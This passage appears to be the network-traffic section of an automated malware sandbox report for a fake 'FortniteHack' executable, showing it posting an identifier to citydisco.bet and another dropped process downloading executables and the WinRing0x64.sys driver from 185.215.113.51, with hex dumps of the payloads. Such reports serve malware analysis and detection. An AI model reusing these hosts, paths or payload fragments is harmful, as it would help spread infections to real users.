00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdcd.&_}2@0L\|~` F@\vl`t(@.text__``.data` _ _@.rdata0`&`@@.pdatavv@@.xdatayx@@.bss2\|.idataFH\|@.CRTh \|@.tls0\|@.rsrc\@\\|@.reloclX}@B
Mar 13, 2025 13:35:41.760112047 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 13, 2025 13:35:41.760171890 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 13, 2025 13:35:41.760212898 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 13, 2025 13:35:41.760225058 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 13, 2025 13:35:41.760278940 CET	1236	IN	Data Raw: e8 30 c4 42 00 4c 8b 2d 01 ad 7c 00 48 89 c7 85 ed 7e 42 31 db 0f 1f 84 00 00 00 00 00 49 8b 4c dd 00 e8 d6 c4 42 00 48 8d 70 01 48 89 f1 e8 02 c4 42 00 49 89 f0 48 89 04 df 49 8b 54 dd 00 48 89 c1 48 83 c3 01 e8 02 c4 42 00 48 39 dd 75 cd 4a 8d Data Ascii: 0BL-\|H~B1ILBHpHBIHITHHBH9uJD'HH=\|uAHn3tL\|\|HLH\|o^i\|g\|Q\|H[^_]A\A]DD$`fDH53t
Mar 13, 2025 13:35:41.760291100 CET	1236	IN	Data Raw: 4c 89 e1 41 b8 04 00 00 00 ba 03 00 00 00 e8 26 16 0b 00 4c 8d 4c 24 60 ba 04 00 00 00 4c 89 e1 41 b8 04 00 00 00 e8 0e 16 0b 00 90 48 83 c4 30 41 5c c3 90 90 90 90 90 90 48 8d 05 29 a0 74 00 48 89 01 e9 a1 2d 59 00 90 41 54 48 83 ec 20 48 8d 05 Data Ascii: LA&LL$`LAH0A\H)tH-YATH HtHI-YLH A\z^f.HtHa-YATH HtHIH-YLH A\:^f.H8LL$XLL$XLL$(-BH8H8H5`LD$PLD$PLL$X
Mar 13, 2025 13:35:41.760314941 CET	1072	IN	Data Raw: 48 89 7c 24 40 48 89 79 08 0f 11 41 10 49 83 ff 03 0f 86 36 02 00 00 4e 8d 74 38 fd 4c 39 f0 0f 83 68 02 00 00 48 89 c7 48 8d 05 66 0e 75 00 45 31 d2 48 89 44 24 38 48 8d 05 37 0e 75 00 4c 8d 2d b0 0e 75 00 48 89 44 24 28 48 8d 05 84 0e 75 00 4c Data Ascii: H\|$@HyAI6Nt8L9hHHfuE1HD$8H7uL-uHD$(HuL%]uHD$0E1ADAED*IRH8LFf(L9vHCLVLFIJHFHNff$fB,PIM9vL
Mar 13, 2025 13:35:41.760360003 CET	1236	IN	Data Raw: 41 c0 e9 02 42 8b 0c 81 41 89 d8 c0 e8 04 41 83 e1 30 41 c1 e8 0b 41 c1 e2 06 83 e0 0c c0 ea 06 41 83 f8 1b 0f 85 9b fe ff ff 0f b6 d2 45 0f b6 c9 0f b6 c0 44 09 d2 44 09 ca 09 c2 80 f2 aa d3 fa 85 d2 75 6b 48 8b 46 10 48 89 c2 4c 8d 40 01 4c 3b Data Ascii: ABAA0AAAEDDukHFHL@L;FvLH$CHVLBHFLFfPHL)H9LVIRH;VdJPHD$@IH[^H`HII"YL$YH[tL^)^Hl`
Mar 13, 2025 13:35:41.760371923 CET	1236	IN	Data Raw: 00 00 48 8d 51 02 45 29 d0 85 c0 41 0f 48 c0 83 f8 63 7e 11 48 83 c1 03 3d e7 03 00 00 48 0f 4f d1 48 83 c2 01 48 83 c2 02 8b 06 41 80 fd 01 48 8d 0d db 31 74 00 48 83 da ff 48 89 c3 48 29 d3 48 39 c2 b8 00 00 00 00 48 0f 43 d8 0f b6 46 0c 49 03 Data Ascii: HQE)AHc~H=HOHHAH1tHHH)H9HCFIT$HFHHHI;T$vI$LHLHIrrDHEHT$@ALD$0H)Lt$0Ll$8'CHIH9rDHP[^_]A\A]A^f.EAO9
Mar 13, 2025 13:35:41.764969110 CET	1236	IN	Data Raw: 24 70 03 00 00 49 8d 4c 24 10 49 89 0c 24 4c 89 e8 48 01 d8 74 09 4d 85 ed 0f 84 c3 0a 00 00 48 89 9c 24 d8 00 00 00 48 83 fb 0f 0f 87 23 0a 00 00 48 83 fb 01 0f 85 f4 09 00 00 41 0f b6 45 00 41 88 44 24 10 49 89 5c 24 08 c6 04 19 00 48 8b 8c 24 Data Ascii: $pIL$I$LHtMH$H#HAEAD$I\$H$hH$`H9I\|$H$AD$1I<$ID$HHuHcE1LHV2[I$0xH_fHD0DHHHuDIt$A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.12	49706	185.215.113.51	80	7572	C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe

Timestamp	Bytes transferred	Direction	Data
Mar 13, 2025 13:35:41.062776089 CET	79	OUT	GET /WinRing0x64.sys HTTP/1.1 Host: 185.215.113.51 Connection: Keep-Alive
Mar 13, 2025 13:35:41.751621962 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 13 Mar 2025 12:35:41 GMT Content-Type: application/octet-stream Content-Length: 14544 Last-Modified: Wed, 15 Jan 2025 19:13:16 GMT Connection: keep-alive ETag: "678808cc-38d0" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$5:nq[q[q[q[}[V{t[V}p[Vmr[Vqp[V\|p[Vxp[Richq[PEd&H"PpdP<`@`p p.text h.rdata\| @H.data0@.pdata`@@HINIT"P .rsrc`@B
Mar 13, 2025 13:35:41.751641035 CET	200	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 8b c4 53 48 83 ec 60 48 83 60 18 00 48 8b d9 48 8d 15 41 06 Data Ascii: HSH`H`HHAHHL$LD$@L\$0A@3HD$(D$ y c% HdHHCpHHH
Mar 13, 2025 13:35:41.751712084 CET	1236	IN	Data Raw: 00 48 8d 4c 24 50 48 89 43 68 ff 15 7d 0f 00 00 48 8d 54 24 40 48 8d 4c 24 50 ff 15 95 0f 00 00 85 c0 8b d8 79 0e 48 8b 8c 24 80 00 00 00 ff 15 61 0f 00 00 8b c3 48 83 c4 60 5b c3 cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 Data Ascii: HL$PHCh}HT$@HL$PyH$aH`[H\$Hl$Ht$WH0Hz8HHH':::BA`@A;A`@A`@tK= @= @= @= @ts= @tO= @tB=`@tA;tA;p
Mar 13, 2025 13:35:41.751724005 CET	1236	IN	Data Raw: 08 45 32 e4 83 e9 01 74 2a 83 e9 01 74 17 83 f9 02 74 05 41 b4 01 eb 26 8b 4f 0c 48 8b fe 48 8b f0 f3 a5 eb 19 8b 4f 0c 48 8b fe 48 8b f0 66 f3 a5 eb 0b 8b 4f 0c 48 8b fe 48 8b f0 f3 a4 48 8b d5 48 8b c8 ff 15 9f 0a 00 00 45 84 e4 75 0b 48 8b 44 Data Ascii: E2t*ttA&OHHOHHfOHHHHEuHD$P3H\$0Hl$8Ht$@H\|$HH A\fffffffH;uHfuHH8LLHd$ H%
Mar 13, 2025 13:35:41.751769066 CET	400	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2-+] f
Mar 13, 2025 13:35:41.751796961 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 00 00 cf 10 00 00 74 21 00 00 d8 10 00 00 1e 14 00 00 60 21 00 00 24 14 00 00 5f Data Ascii: t!`!$_@!h$!! H!(O
Mar 13, 2025 13:35:41.751816034 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 13, 2025 13:35:41.751827002 CET	448	IN	Data Raw: 00 35 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6e 00 73 00 6c 00 61 00 74 00 69 00 6f 00 6e 00 00 00 00 00 11 04 b0 04 00 00 00 00 00 00 00 00 00 Data Ascii: 5DVarFileInfo$Translation0*H010+0h+7Z0X03+70% <<<Obs
Mar 13, 2025 13:35:41.751852036 CET	1236	IN	Data Raw: 32 34 31 30 35 30 35 35 5a 17 0d 30 38 30 39 32 34 31 30 35 30 35 35 5a 30 53 31 0b 30 09 06 03 55 04 06 13 02 4a 50 31 1a 30 18 06 03 55 04 03 13 11 4e 6f 72 69 79 75 6b 69 20 4d 49 59 41 5a 41 4b 49 31 28 30 26 06 09 2a 86 48 86 f7 0d 01 09 01 Data Ascii: 24105055Z080924105055Z0S10UJP10UNoriyuki MIYAZAKI1(0&Hhiyohiyo@crystalmark.info0"0H0e<Bhhpas6~\`yed,\Sz-TKLMU{I/""!n!k?)RA
Mar 13, 2025 13:35:41.751868963 CET	1236	IN	Data Raw: ae d4 88 d9 50 a8 44 91 04 b0 ea 47 ea 5f b2 ed 04 c1 d7 01 7c 21 f8 c4 71 23 fc 6b 4c 65 44 33 c3 8d 1d e6 d2 66 1c 52 29 46 c4 06 e7 0b 35 f0 59 01 66 00 89 cf 9c e3 7b 78 aa 53 e2 ee ac 35 95 e7 fd 5d d7 42 94 95 d3 1a 6e 31 55 47 d7 eb ad c7 Data Ascii: PDG_\|!q#kLeD3fR)F5Yf{xS5]Bn1UGLTqX6?Ye\|@\s 4Ih@i:cG9kA~K!00U0U00UVqcQHRI03U,0*0(&$"http://c
Mar 13, 2025 13:35:41.756562948 CET	1236	IN	Data Raw: 30 33 06 03 55 1d 1f 04 2c 30 2a 30 28 a0 26 a0 24 86 22 68 74 74 70 3a 2f 2f 63 72 6c 2e 67 6c 6f 62 61 6c 73 69 67 6e 2e 6e 65 74 2f 52 6f 6f 74 2e 63 72 6c 30 1f 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 Data Ascii: 03U,00(&$"http://crl.globalsign.net/Root.crl0U#0`{fEP/}4K0HB.vBq@MFM[&t?{\|9C`6B[]Dq"AceJ0?lRm$R'm=I2iBPmRev

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49684	188.114.96.3	443	6908	C:\Users\user\Desktop\FortniteHack.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:35:15 UTC	263	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 57 Host: citydisco.bet
2025-03-13 12:35:15 UTC	57	OUT	Data Raw: 75 69 64 3d 30 65 61 32 39 33 37 62 36 33 35 37 37 36 37 66 31 38 65 39 39 30 37 34 33 63 38 63 36 30 66 65 38 37 36 35 62 39 39 33 32 64 39 33 65 36 38 66 26 63 69 64 3d Data Ascii: uid=0ea2937b6357767f18e990743c8c60fe8765b9932d93e68f&cid=
2025-03-13 12:35:16 UTC	783	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:35:15 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LRSG3UuVrmi%2BySKbxQF5mRVFUbIaj3wfWjgQQQ0f%2BkzsSUPY1pPM35d2fSezWQSEPbhMPaS5FI8UykaT21nb8VlFLABUbX6CL8BlEx5fBVJ%2BCd%2FnY5FM17i9%2Bb93NIOp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb91f4bcf36e89-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13793&min_rtt=13697&rtt_var=4045&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=956&delivery_rate=200235&cwnd=232&unsent_bytes=0&cid=5e948595fa8084d3&ts=1409&x=0"
2025-03-13 12:35:16 UTC	586	IN	Data Raw: f3 e6 d7 47 86 25 6e bf 8d a4 78 f6 2e 7e 2e 55 2a e7 e1 6a 61 b4 c6 a0 46 5c 7e a2 aa f7 db 94 53 2c 93 cc 88 34 84 f1 21 cf a7 b9 c6 11 06 65 80 10 b3 3a e9 9a 88 8c 4f fc 81 76 d0 e0 cf 70 ec 3a d9 ca 53 18 81 36 e7 b2 08 07 0e be bd ed ff 8d b2 28 7f a1 2e a6 01 9f 12 b0 72 fd 60 1a 0d 88 c5 07 07 83 38 14 dd 3f 04 60 98 e1 24 9c ea fb 23 f4 88 cf 6a bf 78 48 b7 49 8d 79 72 cd 18 b5 63 71 e2 aa f5 23 b9 bc 5b 8d 76 65 e5 8d 6b 3a 35 f5 52 32 27 19 a3 17 38 ec 68 d3 64 5b f8 77 3c 38 74 dd db 16 d8 44 b2 e0 18 1f 64 be 1d 9e 56 9b 2d 27 f5 15 1e 58 00 76 7b 9c ea 61 78 38 0f 39 e7 8d e9 14 d6 05 c2 b5 71 54 96 88 53 fb ab 53 de 72 a7 28 3e d1 d0 6a a0 51 67 bf 86 bf fc 76 d4 25 e5 f0 e2 b3 d7 ba 04 b0 7c 05 e5 52 56 dc 84 cf bf 84 95 20 a4 53 76 bb 9d Data Ascii: G%nx.~.U*jaF\~S,4!e:Ovp:S6(.r`8?`$#jxHIyrcq#[vek:5R2'8hd[w<8tDdV-'Xv{ax89qTSSr(>jQgv%\|RV Sv
2025-03-13 12:35:16 UTC	1369	IN	Data Raw: 1f ec e8 dd c7 a6 1e a6 a2 30 c8 6f e2 fe 8a 33 4e 59 6c 9e c1 1f 68 54 bc 5c 31 9d f7 33 4c da b7 9e 8e 43 19 4a 83 4c b5 b8 de 3c ec 18 b1 ce aa 28 85 aa 56 4c af 84 3f 8e 9e 8e 25 76 02 a0 a6 2b f9 1e a4 71 a8 45 de 28 88 3e c0 7d 4f 1b 1c 6e 52 f7 98 48 70 a6 15 6c fb 67 09 87 c2 78 08 97 06 d1 25 63 33 31 14 8e df 5e ba 9c b7 27 09 66 b1 52 9d 83 a2 dc 5b e3 02 2a 24 1f 1b 12 66 cc 6c cf aa c7 19 33 44 dc b5 0f 76 41 fc 08 5e 03 fd 70 16 ea e5 a6 3d 0f eb 77 48 fd b8 84 c0 a0 fd 85 50 81 41 85 ee 58 e5 27 eb d4 ad 5c 07 54 8d 39 1f b2 49 58 bc 12 da 8f b4 ce 4c 96 1f de cb a2 7e 70 f4 4e b5 3c 3c ab ba 1d 2a f9 42 58 31 33 b7 c6 1d f6 ca 10 9f 84 33 c5 d4 ac b5 95 43 fb 41 0f 35 6f 3f 77 2d de e1 cf 55 91 3b a1 c1 d2 30 ac 5e 41 ca b9 90 e0 ca 4e f6 Data Ascii: 0o3NYlhT\13LCJL<(VL?%v+qE(>}OnRHplgx%c31^'fR[$fl3DvA^p=wHPAX'\T9IXL~pN<<BX133CA5o?w-U;0^AN
2025-03-13 12:35:16 UTC	1369	IN	Data Raw: fb 1d f6 8e f7 64 7e 64 c8 12 5d 93 07 6c d5 09 47 2b 17 96 e8 1f fa a8 00 68 96 29 22 a4 86 f5 27 9c 4b 49 64 63 01 6c b6 24 3f bc a8 c1 ad e5 13 4a 20 5e a8 93 4c 55 7e 7d 22 4d 2d 09 0a 49 fd 80 26 b4 10 8d e2 59 1c ea cb b0 4d a6 87 cc 35 5a 41 6f d0 27 cb 90 c7 a5 e2 f0 00 89 75 ca dc 8c 91 2b 2c aa ae a4 7e b7 51 25 b1 c7 24 5a f9 17 f1 2e eb e3 96 d0 8c c0 71 00 e5 aa 4a aa 43 73 e5 fa fa ec 18 df 9b a6 42 4e bb 52 87 66 76 76 7a da 80 ba cb f6 f5 ac 7b 5b 14 af 8a a7 2a df e5 a8 13 40 03 2f 43 34 6f 0e 4b 60 29 dc 35 7d f8 cc 6b cf ef 3d 05 77 c5 83 11 79 2c 03 82 f7 b3 5d 66 c6 47 10 7d db 26 80 45 0f e5 e7 c0 94 eb 68 a8 ae 0e b7 7f 1c cc f5 84 39 75 83 91 aa 70 e6 86 3e 74 6c 2d 66 a7 55 23 3b e5 be 72 1e 21 a2 72 d1 88 55 e4 c6 ea 25 93 e4 86 Data Ascii: d~d]lG+h)"'KIdcl$?J ^LU~}"M-I&YM5ZAo'u+,~Q%$Z.qJCsBNRfvvz{[*@/C4oK`)5}k=wy,]fG}&Eh9up>tl-fU#;r!rU%
2025-03-13 12:35:16 UTC	1369	IN	Data Raw: 06 4f 3c f9 14 c2 af aa e4 24 cb a6 08 f6 7a 16 5d ed c1 71 d3 56 0a ff d5 9a 7d 33 66 c7 81 0f 43 9d 56 5b cb dc 7a 8d ca a0 cf 7a 04 59 cc 7c aa 01 95 71 10 89 98 f9 83 54 2d f9 fb d3 e9 fd 2e 7a 01 3b c9 ed fb f0 2d 73 7a b3 cc b3 aa f7 fd 52 2d a1 a0 3d 17 42 c5 7b b4 ab 8d 4d 88 ab 18 e2 a7 e5 b4 13 bc 6e 72 1d 2f e5 13 6a d2 f2 32 03 e1 66 7c 7d 7b 1f b8 b7 47 b1 dc 53 46 80 09 5a 6a 26 62 75 0a 41 23 fe 57 38 b4 83 6b 7f 57 f2 2c d7 8c 17 3e dd d9 ff 8a d1 f9 2b 03 de 13 d8 e2 a2 63 68 7d f4 5f 20 4e 73 7e 90 33 1c 71 6a 16 54 80 d4 f3 79 e2 90 6b 4f 76 de ac ef 90 23 94 9b 13 df 51 8f cd 85 2b 1f 1a b3 56 21 89 18 d8 20 f0 9a 18 26 50 d4 3b 69 38 7f 80 66 fe 9a a5 68 8b 5f fd f9 2d bd 9b f0 ff b4 87 0f 29 d7 41 f7 f1 fa e9 e9 40 9d b9 da ee 86 43 Data Ascii: O<$z]qV}3fCV[zzY\|qT-.z;-szR-=B{Mnr/j2f\|}{GSFZj&buA#W8kW,>+ch}_ Ns~3qjTykOv#Q+V! &P;i8fh_-)A@C
2025-03-13 12:35:16 UTC	1369	IN	Data Raw: 2f 5e 96 50 ff ef 1f 3e 20 df cd 67 0e 72 9f 13 fa d3 52 b8 92 85 4b 15 6e 48 01 bb 46 32 6e 4e ec 4f c8 0b 13 7f b3 ee 9b ed f2 c1 7a c7 cd db b3 bb d9 46 a4 7e 63 c9 ce f9 88 44 51 a6 c3 93 a3 ab e2 6e bf ac 53 e8 ae 64 26 1c 36 2d 74 4d 97 28 28 8e 13 1e 81 20 d4 10 fc f0 5b 7e bd 0d 12 9c d2 ba 06 84 cf b9 ff a3 8e 1f 39 4a b6 ae 3f 5f b6 8d ce ca 1e 55 50 9a 68 35 61 f5 f3 a7 61 76 70 ee f0 ef c6 e9 0f 20 e3 b9 6e 5c 2c f2 ab ac cc 6e 97 48 35 3e 2a 39 00 41 f4 b7 dc f0 b0 0f b7 16 5e 86 73 48 b5 b5 dd 26 f1 b6 9c 9a 20 6c 60 f4 80 8e 1a 21 15 0d 03 1d 84 ae a2 1e fe e2 26 8b 6e 5b 94 c4 64 3b 8c 7d 94 e4 0a 9f 79 dd 6b e7 3c f3 9f 61 a3 56 f6 e6 a9 57 d2 4c c1 e2 fa 53 66 f0 76 d8 7e bc 5f 1d 50 59 b1 e0 53 5c 36 d4 46 a0 ab 61 89 a8 70 fe f0 d2 f7 Data Ascii: /^P> grRKnHF2nNOzF~cDQnSd&6-tM(( [~9J?_UPh5aavp n\,nH5>*9A^sH& l`!&n[d;}yk<aVWLSfv~_PYS\6Fap
2025-03-13 12:35:16 UTC	1369	IN	Data Raw: f3 bc 2d d3 ac a3 c9 34 a6 e8 61 d0 5c 81 e0 3f c4 27 5b 06 0e 8e b0 0f 1e cc 9c 9a a8 2d c2 ac 31 de 36 ad 6e 30 fb be 7b 2e 4b 5d 80 63 a4 3e 0f 0c 09 bd 60 88 b6 33 2a f1 6a 55 22 a3 03 c9 f2 27 9b fb 1e 46 73 64 de 5b 44 0f 15 3d c3 ba 89 96 a1 5a 7f 75 5f 0e cb f6 e0 d8 c4 10 de c3 1f 64 99 bf a4 5b 77 b4 3a cf f5 c1 10 e6 08 bc ab 44 b7 9d 46 50 43 17 31 1c 14 be 7f fd bc fc 5f bd aa 3b 7c 3a 65 a1 f5 52 a7 15 b1 07 a0 cd 62 db 1f 7a 1c f9 2d bb f2 21 4c 73 97 2b c7 c9 7c e0 bd 0a 60 83 5c 8d 13 d8 27 56 f1 06 f5 3b c5 09 45 11 22 e1 5e 7f 7b 9b a3 a0 3c 4e f1 4f fb 22 1a 22 dc 8c 06 d0 89 66 64 fb 82 03 f6 8a 01 53 86 8e 71 ff e5 54 e1 6e 38 4e 93 02 68 7a 02 35 3d 02 31 72 70 6b 94 75 e3 f7 e8 bc 2c f5 6a ba e2 20 a6 e0 e1 09 f2 2c 2e 3d 38 d4 ea Data Ascii: -4a\?'[-16n0{.K]c>`3*jU"'Fsd[D=Zu_d[w:DFPC1_;\|:eRbz-!Ls+\|`\'V;E"^{<NO""fdSqTn8Nhz5=1rpku,j ,.=8
2025-03-13 12:35:16 UTC	1369	IN	Data Raw: 2b 5c 93 16 62 57 cd cd d2 3f 2d d6 9a 00 d6 91 69 1d 74 d6 eb 8a 7e 1f cc 73 05 5d 90 54 db af d5 a6 3c 60 64 96 1a 41 99 a9 5c 2a fb 9c cd e3 c0 ce c5 09 48 16 85 d7 a1 b9 0c a6 7b f2 9e 3f 14 85 92 10 ef 5e fb 27 d4 a6 14 8e ac ef 2e f1 df 8d de 05 e0 d2 66 39 b9 2f 91 6a 98 21 26 a5 6f 92 1c b5 bf 47 28 57 b1 e0 1d aa 84 b6 16 b1 2e 5e 40 09 3b 48 4b 82 90 c0 f5 3a 0a 34 80 0f 25 be 3e 37 de 5f 19 cb 2e 10 54 db 45 bd 02 0e 50 84 5a c9 ee e0 47 0f 29 ff fe 28 d2 ed c0 fb 43 26 5b 5f 43 9e 71 d3 f2 02 74 b5 79 fe 2d 5c 25 b4 fb 0f 7f df 4c 43 a3 d0 0e 69 c7 c1 d2 ff e2 c3 36 ad 4e ec f0 d2 a9 63 38 8b 2f f7 24 ec 20 31 97 a8 83 3d b2 c1 c5 4e af 95 02 d0 9c e2 64 00 04 6f 97 a9 d4 51 41 d5 5a dd b4 3d bf 02 90 92 4a cf 32 0d 58 6b b6 44 01 96 01 a5 92 Data Ascii: +\bW?-it~s]T<`dA\*H{?^'.f9/j!&oG(W.^@;HK:4%>7_.TEPZG)(C&[_Cqty-\%LCi6Nc8/$ 1=NdoQAZ=J2XkD
2025-03-13 12:35:16 UTC	1369	IN	Data Raw: 8a 72 47 d4 11 30 e5 2e 20 75 33 a6 05 3e 8b dd 85 c0 e7 31 d5 29 30 21 ca da a9 05 b2 3d d6 43 87 b2 c6 ad e5 b6 44 8b 85 8c 46 00 e7 a4 61 8e 01 a6 98 d0 ff a9 a1 85 20 18 d8 82 f3 d6 cf c0 1f fa 02 3e 23 8a b4 7b 37 db 56 cb 30 fd 77 00 7c 4b af 1e 23 46 1b 66 f4 a7 74 f4 16 03 47 43 6c 7b 84 5c 38 4c 83 87 c9 86 88 0c 60 b6 c2 96 5d c5 da 2a 07 7f 16 b8 b9 e2 71 eb 37 a7 cd 42 f6 8d 47 5a 61 56 53 30 e4 3d a8 09 03 c2 32 05 d7 b7 a6 2f 4e cc fa 4a c5 f0 0a 62 5a 9a 4e 72 26 cf e3 3c fe de ea 07 a7 cb e0 6e 7d 29 68 ab f8 db 4f 4a cb 17 e1 c2 d4 cd 7e ed 07 c5 9e c9 29 4a 9b c6 10 86 4f 5a 47 f6 d4 19 f5 5c c0 92 0c 66 36 22 d8 65 f8 8a 60 85 92 aa 66 36 90 86 87 30 9a 50 a5 31 ec a4 d5 bc 24 f7 b1 55 d5 61 fa e9 c0 b7 65 26 a2 c9 f8 96 f1 f0 a5 9d 0a Data Ascii: rG0. u3>1)0!=CDFa >#{7V0w\|K#FftGCl{\8L`]*q7BGZaVS0=2/NJbZNr&<n})hOJ~)JOZG\f6"e`f60P1$Uae&
2025-03-13 12:35:16 UTC	1369	IN	Data Raw: 2e 57 50 5b 5c 3b e6 ff c2 32 1f 94 bb 60 1a b1 de 15 8a 47 3e 3a 10 b8 ef d5 56 fc fb fb d2 40 72 24 56 1c 45 04 76 6f 79 5d 8a ee c7 55 55 60 e3 40 ae 84 1a 45 5f 90 71 81 c0 78 fe c0 c0 b6 61 24 ff 13 18 01 a8 97 7e a0 b0 b6 36 33 d4 de 19 61 9d 9e 0c 11 b8 15 f4 d0 37 a6 7e 80 47 ed ac 12 0e 6d 38 24 dd 14 3c 80 89 5b e3 ac 3a 85 c8 78 98 75 70 0a d8 4b 16 4c aa 06 29 26 7a 6f 7c 45 12 98 95 17 fa 8e 1d c4 a9 f5 7a 75 a8 7d 4e ca ae 0c 58 cd af 6f f7 8a a5 53 4c ca 3f 98 0b 9f 3d cf b9 d7 56 3f 69 4a 28 b5 2a ec cc a7 db e0 9f 42 e6 25 d1 d2 63 31 6a 68 58 2e 1e c2 ca e6 63 fc b9 03 24 0a 21 c3 42 f9 6e 70 e7 9b 92 1f 76 53 0f 81 9e bc 4f f9 ae 3d 45 95 f1 44 fe f5 62 d0 09 0e 23 7a 7c da 9f d0 3f 0c 44 d0 e6 c0 76 8c 97 74 ca 2f ee 18 99 53 52 9f e9 Data Ascii: .WP[\;2`G>:V@r$VEvoy]UU`@E_qxa$~63a7~Gm8$<[:xupKL)&zo\|Ezu}NXoSL?=V?iJ(*B%c1jhX.c$!BnpvSO=EDb#z\|?Dvt/SR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
